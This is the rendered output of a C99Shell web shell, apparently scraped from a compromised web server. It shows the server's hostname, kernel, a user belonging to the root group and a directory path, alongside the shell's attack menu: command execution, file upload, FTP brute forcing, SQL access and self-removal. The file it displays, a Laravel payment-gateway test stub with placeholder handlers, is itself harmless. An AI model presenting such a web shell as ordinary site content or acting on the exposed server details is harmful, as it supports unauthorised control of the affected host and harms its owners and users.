!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache. PHP/8.1.30 

uname -a: Linux server1.tuhinhossain.com 5.15.0-151-generic #161-Ubuntu SMP Tue Jul 22 14:25:40 UTC
2025 x86_64
 

uid=1002(picotech) gid=1003(picotech) groups=1003(picotech),0(root)  

Safe-mode: OFF (not secure)

/home/picotech/domains/classify.picotech.app/public_html/vendor/kingflamez/laravelrave/tests/Stubs/   drwxr-xr-x
Free 28.88 GB of 117.98 GB (24.48%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     PaymentEventHandler.php (3.74 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php

namespace Tests\Stubs;

use 
KingFlamez\Rave\RaveEventHandlerInterface;

class 
PaymentEventHandler implements RaveEventHandlerInterface {
    
/**
     * This is called when the Rave class is initialized
     * */
    
function onInit($initializationData){
        
// Save the transaction to your DB.
        
return 'Payment started......'.json_encode($initializationData).'<br />'//Remember to delete this line
    
}

    
/**
     * This is called only when a transaction is successful
     * */
    
function onSuccessful($transactionData){
        
// Get the transaction from your DB using the transaction reference (txref)
        // Check if you have previously given value for the transaction. If you have, redirect to your successpage else, continue
        // Comfirm that the transaction is successful
        // Confirm that the chargecode is 00 or 0
        // Confirm that the currency on your db transaction is equal to the returned currency
        // Confirm that the db transaction amount is equal to the returned amount
        // Update the db transaction record (includeing parameters that didn't exist before the transaction is completed. for audit purpose)
        // Give value for the transaction
        // Update the transaction to note that you have given value for the transaction
        // You can also redirect to your success page from here
        
return 'Payment Successful!'.json_encode($transactionData).'<br />'//Remember to delete this line
    
}

    
/**
     * This is called only when a transaction failed
     * */
    
function onFailure($transactionData){
        
// Get the transaction from your DB using the transaction reference (txref)
        // Update the db transaction record (includeing parameters that didn't exist before the transaction is completed. for audit purpose)
        // You can also redirect to your failure page from here
        
return 'Payment Failed!'.json_encode($transactionData).'<br />'//Remember to delete this line
    
}

    
/**
     * This is called when a transaction is requeryed from the payment gateway
     * */
    
function onRequery($transactionReference){
        
// Do something, anything!
        
return  'Payment requeried......'.$transactionReference.'<br />'//Remember to delete this line
    
}

    
/**
     * This is called a transaction requery returns with an error
     * */
    
function onRequeryError($requeryResponse){
        
// Do something, anything!
        
return 'An error occured while requeying the transaction...'.json_encode($requeryResponse).'<br />'//Remember to delete this line
    
}

    
/**
     * This is called when a transaction is canceled by the user
     * */
    
function onCancel($transactionReference){
        
// Do something, anything!
        // Note: Somethings a payment can be successful, before a user clicks the cancel button so proceed with caution
        
return 'Payment canceled by user......'.$transactionReference.'<br />'//Remember to delete this line
    
}

    
/**
     * This is called when a transaction doesn't return with a success or a failure response. This can be a timedout transaction on the Rave server or an abandoned transaction by the customer.
     * */
    
function onTimeout($transactionReference$data){
        
// Get the transaction from your DB using the transaction reference (txref)
        // Queue it for requery. Preferably using a queue system. The requery should be about 15 minutes after.
        // Ask the customer to contact your support and you should escalate this issue to the flutterwave support team. Send this as an email and as a notification on the page. just incase the page timesout or disconnects
        
return 'Payment timeout......'.$transactionReference.' - '.json_encode($data).'<br />'//Remember to delete this line
    
}
}

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.004 ]--